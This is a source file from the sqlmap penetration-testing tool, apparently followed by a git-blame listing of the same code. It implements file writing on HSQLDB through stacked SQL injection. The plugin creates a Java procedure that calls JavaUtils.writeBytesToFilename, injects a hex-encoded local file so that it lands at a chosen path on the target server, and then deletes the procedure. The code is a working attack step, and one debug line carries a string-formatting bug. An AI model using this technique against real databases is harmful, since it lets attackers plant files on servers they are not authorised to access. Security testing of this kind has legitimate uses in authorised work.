sqlmap/plugins/dbms/hsqldb/filesystem.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.common import randomStr
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import stackedmethod
from lib.core.enums import PLACE
from lib.request import inject
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem

class Filesystem(GenericFilesystem):
    def readFile(self, remoteFile):
        errMsg = "on HSQLDB it is not possible to read files"
        raise SqlmapUnsupportedFeatureException(errMsg)

    @stackedmethod
    def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        funcName = randomStr()
        max_bytes = 1024 * 1024

        debugMsg = "creating JLP procedure '%s'" % funcName
        logger.debug(debugMsg)

        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
        addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
        addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
        inject.goStacked(addFuncQuery)

        fcEncodedList = self.fileEncode(localFile, "hex", True)
        fcEncodedStr = fcEncodedList[0][2:]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "as the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warning(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
        logger.debug(debugMsg)

        # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
        invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
        inject.goStacked(invokeQuery)

        logger.debug("cleaning up" % funcName)
        delQuery = "DELETE PROCEDURE %s" % funcName
        inject.goStacked(delQuery)

        message = "the local file '%s' has been written on the back-end DBMS" % localFile
        message += "file system ('%s')" % remoteFile
        logger.info(message)
Last preparations for DREI 2019-05-08 13:47:52 +03:00			`#!/usr/bin/env python`
Add unimplemented files 2013-06-24 17:53:41 +04:00
			`"""`
Year and version bump 2023-01-03 01:24:59 +03:00			`Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
Add unimplemented files 2013-06-24 17:53:41 +04:00			`"""`

HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`from lib.core.common import randomStr`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.decorators import stackedmethod`
			`from lib.core.enums import PLACE`
			`from lib.request import inject`
Add unimplemented files 2013-06-24 17:53:41 +04:00			`from lib.core.exception import SqlmapUnsupportedFeatureException`
			`from plugins.generic.filesystem import Filesystem as GenericFilesystem`

			`class Filesystem(GenericFilesystem):`
Some renaming (pylint stuff) 2019-06-03 11:41:51 +03:00			`def readFile(self, remoteFile):`
Minor consistency patch (Issue #475) 2013-07-01 15:01:53 +04:00			`errMsg = "on HSQLDB it is not possible to read files"`
Add unimplemented files 2013-06-24 17:53:41 +04:00			`raise SqlmapUnsupportedFeatureException(errMsg)`

HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`@stackedmethod`
			`def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):`
			`funcName = randomStr()`
Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`max_bytes = 1024 * 1024`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00
Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`debugMsg = "creating JLP procedure '%s'" % funcName`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`logger.debug(debugMsg)`

Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "`
			`addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"`
			`inject.goStacked(addFuncQuery)`

			`fcEncodedList = self.fileEncode(localFile, "hex", True)`
			`fcEncodedStr = fcEncodedList[0][2:]`
			`fcEncodedStrLen = len(fcEncodedStr)`

			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`warnMsg = "as the injection is on a GET parameter and the file "`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
Fixing DeprecationWarning (logger.warn) 2022-06-22 13:04:34 +03:00			`logger.warning(warnMsg)`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00
			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)`
			`logger.debug(debugMsg)`

Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures`
			`invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`inject.goStacked(invokeQuery)`

Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`logger.debug("cleaning up" % funcName)`
			`delQuery = "DELETE PROCEDURE %s" % funcName`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`inject.goStacked(delQuery)`

Trivial refactoring for #4379 2020-10-13 12:05:13 +03:00			`message = "the local file '%s' has been written on the back-end DBMS" % localFile`
HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local> 2020-10-13 11:56:39 +03:00			`message += "file system ('%s')" % remoteFile`
			`logger.info(message)`